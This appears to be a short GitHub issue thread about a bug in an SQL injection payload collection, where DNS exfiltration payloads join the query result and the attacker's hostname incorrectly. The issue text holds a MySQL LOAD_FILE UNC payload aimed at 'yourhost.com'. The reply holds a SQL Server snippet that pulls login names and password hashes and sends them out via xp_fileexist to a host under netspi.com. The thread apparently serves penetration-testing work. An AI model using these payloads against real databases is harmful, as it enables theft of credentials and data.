DNS request command is malformed

Question

DNS request command is malformed

aph3rson opened this issue 7 years ago · 1 comments

SELECT LOAD_FILE(concat('\\\\',(QUERY_WITH_ONLY_ONE_ROW), 'yourhost.com\\'))

Doing this will create a hostname like rootyourhost.com, which won't work for things like Burp Collaborator, or any customized DNS server.

I'll make a PR for this shortly.

Answer 1 · 2018-10-19T14:52:43.000Z

SQL server also affected:

DECLARE @host varchar(800);
select @host = name + '-' + master.sys.fn_varbintohexstr(password_hash) + 'netspi.com' from sys.sql_logins;
exec('xp_fileexist "\' + @host + 'c$boot.ini"');

Same issue.